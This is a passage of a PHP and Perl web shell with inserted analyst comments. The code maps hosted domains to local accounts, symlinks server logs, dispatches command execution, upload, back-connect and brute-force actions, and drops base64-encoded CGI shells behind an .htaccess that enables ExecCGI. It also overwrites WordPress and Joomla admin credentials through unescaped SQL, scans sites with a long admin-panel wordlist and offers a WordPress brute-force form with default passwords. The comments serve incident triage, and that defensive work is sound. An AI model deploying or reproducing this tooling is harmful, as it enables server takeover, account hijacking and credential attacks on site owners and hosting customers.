5941 $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a> | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
5942 $result .= "</tr>";
5943 $i++;
5944 }
5945 foreach my $f (@fname)
5946 {
5947 $style= ($style eq "line") ? "notline": "line";
5948 $file=$f;
5949 $f = $path.$f;
5950 $view = "?dir=".$path."&view=".$f;
5951 $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
5952 $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
5953 $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
5954 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
5955 $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
5956 $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
5957 $result .= "</tr>";
5958 $i++;
5959 }
5960 $result .= "</table></div>";
5961 }
5962 return $result;
5963}
5964#------------------------------------------------------------------------------
5965# Try to View List User
5966#------------------------------------------------------------------------------
5967sub ViewDomainUser
5968{
 # Shared-hosting reconnaissance: reads /etc/named.conf, and for every line
 # that contains a zone "..." { declaration it stats a path built under
 # /etc/valiases/ and resolves the owning uid to an account name, returning
 # the result as an HTML table.
 # Analyst notes:
 # - the purpose is to map hosted domains to local accounts on the same box;
 # - reads of /etc/named.conf and of /etc/valiases/ by the web server account
 # are unusual and worth auditing; on shared hosts these paths should not be
 # readable by customer CGI processes.
5969 open (domains, '/etc/named.conf') or $err=1;
5970 my @cnzs = <domains>;
5971 close d0mains;
5972 my $style="line";
5973 my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
5974 if ($err)
5975 {
5976 $result .= ('<p>C0uldn\'t Bypass it , Sorry</p>');
5977 return $result;
5978 }else
5979 {
5980 $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
5981 }
5982 foreach my $one (@cnzs)
5983 {
5984 if($one =~ m/.*?zone "(.*?)" {/)
5985 {
5986 $style= ($style eq "line") ? "notline": "line";
5987 $filename= "/etc/valiases/".$one;
 # element 4 of stat() is the owner uid
5988 $owner = getpwuid((stat($filename))[4]);
5989 $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
5990 }
5991 }
5992 $result .= '</table>';
5993 return $result;
5994}
5995#------------------------------------------------------------------------------
5996# View Log
5997#------------------------------------------------------------------------------
5998sub ViewLog
5999{
 # Builds a table with one form per hard-coded web server log path; submitting
 # a form sends "less <path>" as a command through action "command".
 # Returns a fixed message instead when $WinNT is set.
 # Analyst notes:
 # - for a log that is not writable the sub shells out to ln -s, creating a
 # symlink named error_log_<index> in the working directory of the script;
 # symlinks with those names next to a CGI file are a file-system indicator;
 # - the middle path reads /var/log/hxxpd/error_log in this copy; the paste
 # appears to have defanged "http" strings, so the original was presumably
 # the httpd log directory - confirm against a clean sample;
 # - server logs should not be readable or writable by the account that runs
 # site CGI scripts.
6000 if($WinNT)
6001 {
6002 return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
6003 }
6004 my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
6005 my @pathlog=(
6006 '/usr/local/apache/logs/error_log',
6007 '/var/log/hxxpd/error_log',
6008 '/usr/local/apache/logs/access_log'
6009 );
6010 my $i=0;
6011 my $perms;
6012 my $sl;
6013 foreach my $log (@pathlog)
6014 {
6015 if(-w $log)
6016 {
6017 $perms="OK";
6018 }else
6019 {
6020 chop($sl = `ln -s $log error_log_$i`);
6021 if(&trim($ls) eq "")
6022 {
6023 if(-r $ls)
6024 {
6025 $perms="OK";
6026 $log="error_log_".$i;
6027 }
6028 }else
6029 {
6030 $perms="<font style='color: red;'>Cancel<font>";
6031 }
6032 }
6033 $result .=<<END;
6034 <tr>
6035
6036 <form action="" method="post">
6037 <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
6038 <td><input class="submit" type="submit" value="Try" /></td>
6039 <input type="hidden" id="log_$i" name="c" value="less $log"/>
6040 <input type="hidden" name="a" value="command" />
6041 <input type="hidden" name="d" value="$CurrentDir" />
6042 </form>
6043 <td>$perms</td>
6044
6045 </tr>
6046END
6047 $i++;
6048 }
6049 $result .="</table>";
6050 return $result;
6051}
6052#------------------------------------------------------------------------------
6053# Main Program - Execution Starts Here
6054#------------------------------------------------------------------------------
# Request dispatcher of the CGI script.
# Analyst summary of the request interface visible below:
# - parameter a selects the action: login, gui, command, save, upload,
# backbind, bruteforcer, download, checklog, domainsuser, logout;
# - p = password, c = command text, d = working directory, f = file name,
# o = option flag; chmod, rename, remove, data and file are read by
# individual actions;
# - authentication is a string comparison between the SAVEDPWD cookie and
# $Password (defined outside this excerpt); every action other than the
# login path runs only when that comparison succeeds.
# These parameter names, the cookie name and the action values are stable
# strings that can be matched in web access logs and WAF rules.
# NOTE(review): ReadParse presumably fills %in from the query string and
# request body; it is defined outside this excerpt.
6055&ReadParse;
6056&GetCookies;
6057
6058$ScriptLocation = $ENV{'SCRIPT_NAME'};
6059$ServerName = $ENV{'SERVER_NAME'};
6060$LoginPassword = $in{'p'};
6061$RunCommand = $in{'c'};
6062$TransferFile = $in{'f'};
6063$Options = $in{'o'};
6064$Action = $in{'a'};
6065
6066$Action = "command" if($Action eq ""); # no action specified, use default
6067
6068# get the directory in which the commands will be executed
6069$CurrentDir = &trim($in{'d'});
6070# default: show a directory listing when no command was supplied
6071$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
6072chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
6073
# the cookie value is compared with the configured password as plain text
6074$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
6075
6076if($Action eq "login" || !$LoggedIn) # user needs/has to login
6077{
6078 &PerformLogin;
6079}elsif($Action eq "gui") # GUI directory
6080{
6081 &PrintPageHeader;
6082 if(!$WinNT)
6083 {
6084 $chmod=int($in{'chmod'});
6085 if(!($chmod eq 0))
6086 {
6087 $chmod=int($in{'chmod'});
6088 $file=$CurrentDir.$PathSep.$TransferFile;
 # permission change is done by shelling out to chmod with a request-derived path
6089 chop($result= `chmod $chmod "$file"`);
6090 if(&trim($result) eq "")
6091 {
6092 print "<run> Done! </run><br>";
6093 }else
6094 {
6095 print "<run> Sorry! You dont have permissions! </run><br>";
6096 }
6097 }
6098 }
6099 $rename=$in{'rename'};
6100 if(!$rename eq "")
6101 {
6102 if(rename($TransferFile,$rename))
6103 {
6104 print "<run> Done! </run><br>";
6105 }else
6106 {
6107 print "<run> Sorry! You dont have permissions! </run><br>";
6108 }
6109 }
6110 $remove=$in{'remove'};
6111 if($remove ne "")
6112 {
6113 $rm = $CurrentDir.$PathSep.$remove;
6114 if(-d $rm)
6115 {
 # directories are deleted recursively
6116 &RmDir($rm);
6117 }else
6118 {
6119 if(unlink($rm))
6120 {
6121 print "<run> Done! </run><br>";
6122 }else
6123 {
6124 print "<run> Sorry! You dont have permissions! </run><br>";
6125 }
6126 }
6127 }
6128 print &ListDir;
6129
6130}
6131elsif($Action eq "command") # user wants to run a command
6132{
6133 &PrintPageHeader("c");
6134 print &ExecuteCommand;
6135}
6136elsif($Action eq "save") # user wants to save a file
6137{
6138 &PrintPageHeader;
6139 if(&SaveFile($in{'data'},$in{'file'}))
6140 {
6141 print "<run> Done! </run><br>";
6142 }else
6143 {
6144 print "<run> Sorry! You dont have permissions! </run><br>";
6145 }
6146 print &ListDir;
6147}
6148elsif($Action eq "upload") # user wants to upload a file
6149{
6150 &PrintPageHeader;
6151
6152 print &UploadFile;
6153}
6154elsif($Action eq "backbind") # user wants to back connect or bind port
6155{
6156 &PrintPageHeader("clientport");
6157 print &BackBind;
6158}
6159elsif($Action eq "bruteforcer") # user wants to brute force
6160{
6161 &PrintPageHeader;
6162 print &BruteForcer;
6163}elsif($Action eq "download") # user wants to download a file
6164{
6165 print &DownloadFile;
6166}elsif($Action eq "checklog") # user wants to view log file
6167{
6168 &PrintPageHeader;
6169 print &ViewLog;
6170
6171}elsif($Action eq "domainsuser") # user wants to view list user/domain
6172{
6173 &PrintPageHeader;
6174 print &ViewDomainUser;
6175}elsif($Action eq "logout") # user wants to logout
6176{
6177 &PerformLogout;
6178}
6179&PrintPageFooter;
6180'; $file = fopen("cgi2012.izo" ,"w+"); $write = fwrite ($file ,base64_decode($cgi2012)); fclose($file); chmod("cgi2012.izo",0755); echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>
6181
6182 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'config')) { ?>
6183<form action="?y=<?php echo $pwd; ?>&x=config" method="post">
6184
6185<?php
// Branch ?x=config: drops a CGI-enabled directory beside the shell and loads it in an iframe.
// Host artefacts created by the statements below (usable as indicators during triage):
//   - a `config/` directory, mode 0755, under the script's current working directory;
//   - `config/.htaccess` whose body turns on ExecCGI and maps the `.izo` extension to cgi-script;
//   - `config/config.izo`, written from base64_decode($configshell) and set to mode 0755.
// $configshell is assigned outside this excerpt, so the dropped payload is not visible here.
// `x-hxxpd-cgi` in the AddType line carries the paste's http -> hxxp defanging.
// The gutter numbers (6186-6190) sit inside the $metin string literal in this paste.
// Mitigation note: the drop only takes effect where .htaccess overrides are honoured;
// withholding AllowOverride Options/FileInfo on web-writable directories blocks the handler mapping.
echo "<center/><br/><b><font color=#FF0000>--==[ Config Shell Priv8 SCR ]==--</font></b><br><br>"; mkdir('config', 0755); chdir('config'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Error cuyy!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
6186
6187AddType application/x-hxxpd-cgi .cpc
6188
6189AddHandler cgi-script .izo
6190AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya);
// chdir('config') ran earlier, so this write lands in config/config.izo (the iframe src below agrees).
$file = fopen("config.izo" ,"w+"); $write = fwrite ($file ,base64_decode($configshell)); fclose($file); chmod("config.izo",0755); echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>
6191 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset')) { ?>
6192<form action="?y=<?php echo $pwd; ?>&x=wp-reset" method="post">
6193
6194<?php
// Branch ?x=wp-reset: overwrites WordPress account rows using database credentials typed into the form.
// With an empty POST 'pwd' it only renders the form; otherwise it runs the UPDATE statements further down.
// The gutter numbers (6195-6207) sit inside the echoed form string in this paste.
echo "<center/><br/><b><font color=#FF0000>--==[ Wordpress Reset Password ]==--</font></b><br><br>"; if(empty($_POST['pwd'])){ echo "<FORM method='POST'>
6195<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td> Hostname</td><td>
6196<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
6197<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
6198<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
6199<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
6200<tr><td> User baru</td><td>
6201<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
6202 <tr><td> Pass Baru</td><td>
6203<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />
6204
6205<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
6206</td></tr> </table><br><br><br><br>
6207"; }else{
// Analyst notes on the statements that follow:
//   - Uses the legacy mysql_* extension (removed in PHP 7), which dates the sample.
//   - Table name `wp_users` and row IDs 1, 2 and 3 are hard-coded; each row gets the same
//     user_login and user_pass. A custom table prefix would make these statements miss.
//   - POST values are concatenated into the SQL text without escaping.
//   - user_pass is set to crypt($pwd) called with no salt argument.
//   - The final UPDATE writes $SQL into user_email for ID 1; $SQL is not assigned anywhere
//     in the visible part of this branch.
// Indicators for responders: wp_users rows 1-3 sharing one login name and one password hash,
// and database logins from the web host using credentials read from wp-config.php.
$localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error()); if($a4s){ echo "<b> Success!! Now You Can Login To wp-admin</b> "; } } echo "
6208 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset')) { ?>
6209<form action="?y=<?php echo $pwd; ?>&x=jm-reset" method="post">
6210
6211<?php
// Branch ?x=jm-reset: overwrites Joomla account rows using database credentials typed into the form.
// With an empty POST 'pwd' it only renders the form; otherwise it runs the UPDATE statements further down.
// The form pre-fills 'pwd' with e10adc3949ba59abbe56e057f20f883e, which the form itself labels
// as the value for "123456"; the string is stored as-is, so it is a searchable indicator.
// The gutter numbers (6212-6223) sit inside the echoed form string in this paste.
echo "<center/><br/><b><font color=#FF0000>--==[ Joomla Reset Password ]==--</font></b><br><br>"; if(empty($_POST['pwd'])){ echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to MySQL </th></tr> <tr><td> Host</td><td>
6212<input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
6213<input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td> username</td><td>
6214<input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td> password</td><td>
6215<input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
6216<tr><td> User baru</td><td>
6217<input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
6218 <tr><td> pass baru </td><td>123456 =
6219<input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />
6220
6221<input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
6222</td></tr> </table><br><br><br><br>
6223"; }else{
// Analyst notes on the statements that follow:
//   - Uses the legacy mysql_* extension (removed in PHP 7), which dates the sample.
//   - Table name `jos_users` and row IDs 62, 63, 64 and 65 are hard-coded; each row gets the
//     same username and password value.
//   - POST values are concatenated into the SQL text without escaping.
//   - $hash = crypt($pwd) is computed but never used; the password column receives the raw
//     POST 'pwd' string.
// Indicators for responders: jos_users rows 62-65 sharing one username and one password value,
// and database logins from the web host using credentials read from the site configuration.
$localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error()); if($SQL){ echo "<b>Success : New Password >>> - (123456)"; } } echo "
6224 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'adfin')) { ?>
6225<form action="?y=<?php echo $pwd; ?>&x=adfin" method="post">
6226
6227<?php set_time_limit(0); error_reporting(0); $list['front'] ="admin
6228adm
6229admincp
6230admcp
6231cp
6232modcp
6233moderatorcp
6234adminare
6235admins
6236cpanel
6237controlpanel"; $list['end'] = "admin1.php
6238admin1.html
6239admin2.php
6240admin2.html
6241yonetim.php
6242yonetim.html
6243yonetici.php
6244yonetici.html
6245ccms/
6246ccms/login.php
6247ccms/index.php
6248maintenance/
6249webmaster/
6250adm/
6251configuration/
6252configure/
6253websvn/
6254admin/
6255admin/account.php
6256admin/account.html
6257admin/index.php
6258admin/index.html
6259admin/login.php
6260admin/login.html
6261admin/home.php
6262admin/controlpanel.html
6263admin/controlpanel.php
6264admin.php
6265admin.html
6266admin/cp.php
6267admin/cp.html
6268cp.php
6269cp.html
6270administrator/
6271administrator/index.html
6272administrator/index.php
6273administrator/login.html
6274administrator/login.php
6275administrator/account.html
6276administrator/account.php
6277administrator.php
6278administrator.html
6279login.php
6280login.html
6281modelsearch/login.php
6282moderator.php
6283moderator.html
6284moderator/login.php
6285moderator/login.html
6286moderator/admin.php
6287moderator/admin.html
6288moderator/
6289account.php
6290account.html
6291controlpanel/
6292controlpanel.php
6293controlpanel.html
6294admincontrol.php
6295admincontrol.html
6296adminpanel.php
6297adminpanel.html
6298admin1.asp
6299admin2.asp
6300yonetim.asp
6301yonetici.asp
6302admin/account.asp
6303admin/index.asp
6304admin/login.asp
6305admin/home.asp
6306admin/controlpanel.asp
6307admin.asp
6308admin/cp.asp
6309cp.asp
6310administrator/index.asp
6311administrator/login.asp
6312administrator/account.asp
6313administrator.asp
6314login.asp
6315modelsearch/login.asp
6316moderator.asp
6317moderator/login.asp
6318moderator/admin.asp
6319account.asp
6320controlpanel.asp
6321admincontrol.asp
6322adminpanel.asp
6323fileadmin/
6324fileadmin.php
6325fileadmin.asp
6326fileadmin.html
6327administration/
6328administration.php
6329administration.html
6330sysadmin.php
6331sysadmin.html
6332phpmyadmin/
6333myadmin/
6334sysadmin.asp
6335sysadmin/
6336ur-admin.asp
6337ur-admin.php
6338ur-admin.html
6339ur-admin/
6340Server.php
6341Server.html
6342Server.asp
6343Server/
6344wp-admin/
6345administr8.php
6346administr8.html
6347administr8/
6348administr8.asp
6349webadmin/
6350webadmin.php
6351webadmin.asp
6352webadmin.html
6353administratie/
6354admins/
6355admins.php
6356admins.asp
6357admins.html
6358administrivia/
6359Database_Administration/
6360WebAdmin/
6361useradmin/
6362sysadmins/
6363admin1/
6364system-administration/
6365administrators/
6366pgadmin/
6367directadmin/
6368staradmin/
6369ServerAdministrator/
6370SysAdmin/
6371administer/
6372LiveUser_Admin/
6373sys-admin/
6374typo3/
6375panel/
6376cpanel/
6377cPanel/
6378cpanel_file/
6379platz_login/
6380rcLogin/
6381blogindex/
6382formslogin/
6383autologin/
6384support_login/
6385meta_login/
6386manuallogin/
6387simpleLogin/
6388loginflat/
6389utility_login/
6390showlogin/
6391memlogin/
6392members/
6393login-redirect/
6394sub-login/
6395wp-login/
6396login1/
6397dir-login/
6398login_db/
6399xlogin/
6400smblogin/
6401customer_login/
6402UserLogin/
6403login-us/
6404acct_login/
6405admin_area/
6406bigadmin/
6407project-admins/
6408phppgadmin/
6409pureadmin/
6410sql-admin/
6411radmind/
6412openvpnadmin/
6413wizmysqladmin/
6414vadmind/
6415ezsqliteadmin/
6416hpwebjetadmin/
6417newsadmin/
6418adminpro/
6419Lotus_Domino_Admin/
6420bbadmin/
6421vmailadmin/
6422Indy_admin/
6423ccp14admin/
6424irc-macadmin/
6425banneradmin/
6426sshadmin/
6427phpldapadmin/
6428macadmin/
6429administratoraccounts/
6430admin4_account/
6431admin4_colon/
6432radmind-1/
6433Super-Admin/
6434AdminTools/
6435cmsadmin/
6436SysAdmin2/
6437globes_admin/
6438cadmins/
6439phpSQLiteAdmin/
6440navSiteAdmin/
6441server_admin_small/
6442logo_sysadmin/
6443server/
6444database_administration/
6445power_user/
6446system_administration/
6447ss_vms_admin_sm/
6448adminarea/
6449bb-admin/
6450adminLogin/
6451panel-administracion/
6452instadmin/
6453memberadmin/
6454administratorlogin/
6455admin/admin.php
6456admin_area/admin.php
6457admin_area/login.php
6458siteadmin/login.php
6459siteadmin/index.php
6460siteadmin/login.html
6461admin/admin.html
6462admin_area/index.php
6463bb-admin/index.php
6464bb-admin/login.php
6465bb-admin/admin.php
6466admin_area/login.html
6467admin_area/index.html
6468admincp/index.asp
6469admincp/login.asp
6470admincp/index.html
6471webadmin/index.html
6472webadmin/admin.html
6473webadmin/login.html
6474admin/admin_login.html
6475admin_login.html
6476panel-administracion/login.html
6477nsw/admin/login.php
6478webadmin/login.php
6479admin/admin_login.php
6480admin_login.php
6481admin_area/admin.html
6482pages/admin/admin-login.php
6483admin/admin-login.php
6484admin-login.php
6485bb-admin/index.html
6486bb-admin/login.html
6487bb-admin/admin.html
6488admin/home.html
6489pages/admin/admin-login.html
6490admin/admin-login.html
6491admin-login.html
6492admin/adminLogin.html
6493adminLogin.html
6494home.html
6495rcjakar/admin/login.php
6496adminarea/index.html
6497adminarea/admin.html
6498webadmin/index.php
6499webadmin/admin.php
6500user.html
6501modelsearch/login.html
6502adminarea/login.html
6503panel-administracion/index.html
6504panel-administracion/admin.html
6505modelsearch/index.html
6506modelsearch/admin.html
6507admincontrol/login.html
6508adm/index.html
6509adm.html
6510user.php
6511panel-administracion/login.php
6512wp-login.php
6513adminLogin.php
6514admin/adminLogin.php
6515home.php
6516adminarea/index.php
6517adminarea/admin.php
6518adminarea/login.php
6519panel-administracion/index.php
6520panel-administracion/admin.php
6521modelsearch/index.php
6522modelsearch/admin.php
6523admincontrol/login.php
6524adm/admloginuser.php
6525admloginuser.php
6526admin2/login.php
6527admin2/index.php
6528adm/index.php
6529adm.php
6530affiliate.php
6531adm_auth.php
6532memberadmin.php
6533administratorlogin.php
6534admin/admin.asp
6535admin_area/admin.asp
6536admin_area/login.asp
6537admin_area/index.asp
6538bb-admin/index.asp
6539bb-admin/login.asp
6540bb-admin/admin.asp
6541pages/admin/admin-login.asp
6542admin/admin-login.asp
6543admin-login.asp
6544user.asp
6545webadmin/index.asp
6546webadmin/admin.asp
6547webadmin/login.asp
6548admin/admin_login.asp
6549admin_login.asp
6550panel-administracion/login.asp
6551adminLogin.asp
6552admin/adminLogin.asp
6553home.asp
6554adminarea/index.asp
6555adminarea/admin.asp
6556adminarea/login.asp
6557panel-administracion/index.asp
6558panel-administracion/admin.asp
6559modelsearch/index.asp
6560modelsearch/admin.asp
6561admincontrol/login.asp
6562adm/admloginuser.asp
6563admloginuser.asp
6564admin2/login.asp
6565admin2/index.asp
6566adm/index.asp
6567adm.asp
6568affiliate.asp
6569adm_auth.asp
6570memberadmin.asp
6571administratorlogin.asp
6572siteadmin/login.asp
6573siteadmin/index.asp
6574ADMIN/
6575paneldecontrol/
6576login/
6577cms/
6578admon/
6579ADMON/
6580administrador/
6581ADMIN/login.php
6582panelc/
6583ADMIN/login.html"; function template() { echo '
6584
6585<script type="text/javascript">
6586<!--
6587function insertcode($text, $place, $replace)
6588{
6589 var $this = $text;
6590 var logbox = document.getElementById($place);
6591 if($replace == 0)
6592 document.getElementById($place).innerHTML = logbox.innerHTML+$this;
6593 else
6594 document.getElementById($place).innerHTML = $this;
6595//document.getElementById("helpbox").innerHTML = $this;
6596}
6597-->
6598</script>
6599<br>
6600<br>
6601<h1 class="technique-two">
6602
6603
6604
6605</h1>
6606
6607<div class="wrapper">
6608<div class="red">
6609<div class="tube">
6610<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
6611<form action="" method="post" name="xploit_form">
6612
6613<tr>
6614<tr>
6615 <b><td>URL</td>
6616 <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
6617 </td>
6618</tr><tr>
6619 <td>404 string</td>
6620 <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
6621 </td></b>
6622</tr><br><td>
6623<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
6624</span></td></tr>
6625</form></td></tr>
6626<br /></table>
6627</div> <!-- /tube -->
6628</div> <!-- /red -->
6629<br />
6630<div class="green">
6631<div class="tube" id="rightcol">
6632Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
6633<b>Found ones:<br /></b>
6634</div> <!-- /tube -->
6635</div></center><!-- /green -->
6636<br clear="all" /><br />
6637<div class="blue">
6638<div class="tube" id="logbox">
6639<br />
6640<br />
6641Admin page Finder :<br /><br />
6642</div> <!-- /tube -->
6643</div> <!-- /blue -->
6644</div> <!-- /wrapper -->
6645<br clear="all"><br>'; } function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) { if($br == 1) $msg .= "<br />"; echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>"; if($stop == 1) exit; @flush();@ob_flush(); } function check($x, $front=0) { global $_POST,$site,$false; if($front == 0) $t = $site.$x; else $t = 'hxxp://'.$x.'.'.$site.'/'; $headers = get_headers($t); if (!eregi('200', $headers[0])) return 0; $data = @file_get_contents($t); if($_POST['xploit_404string'] == "") if($data == $false) return 0; if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0; return 1; } template(); if(!isset($_POST['xploit_url'])) die; if($_POST['xploit_url'] == '') die; $site = $_POST['xploit_url']; if ($site[strlen($site)-1] != "/") $site .= "/"; if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html"); $list['end'] = str_replace("\r", "", $list['end']); $list['front'] = str_replace("\r", "", $list['front']); $pathes = explode("\n", $list['end']); $frontpathes = explode("\n", $list['front']); show(count($pathes)+count($frontpathes), 1, 0, 'total', 1); $verificate = 0; foreach($pathes as $path) { show('Checking '.$site.$path.' 
: ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($path) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0); show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0); } } preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1]; if(substr($site, 0, 3) == "www") $site = substr($site, 4); foreach($frontpathes as $frontpath) { show('Checking hxxp://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0); show('<a href="hxxp://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0); } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'wpbrute')) { ?>
6646<form action="?y=<?php echo $pwd; ?>&x=wpbrute" method="post">
6647<center>
6648<br><Br><b><font size='2' >--==[ Wordpress Brute Force ]==--</font><br>
6649<center><p>Thanks To <a href="hxxps://www.facebook.com/r00t.info/" target="_blank">Cah_bagus</a></p></b></center>
6650<form enctype="multipart/form-data" method="POST">
6651 <table width='624' border='0' class='tabnet' id='Box'>
6652 <tr><th colspan="5">Wordpress Brute Force</th></tr>
6653
6654
6655 <tr>
6656 <td > </td>
6657 <td ><p>Hosts:</p></td>
6658 <td ><p> Users:</p></td>
6659 <td ><p>Passwords:</p></td>
6660 </tr>
6661 <tr>
6662 <td> </td>
6663 <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
6664 <td ><textarea style="background:black;" name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
6665 <td ><textarea style="background:black;" name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\nc40909\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
6666 </tr>
6667<tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now" />
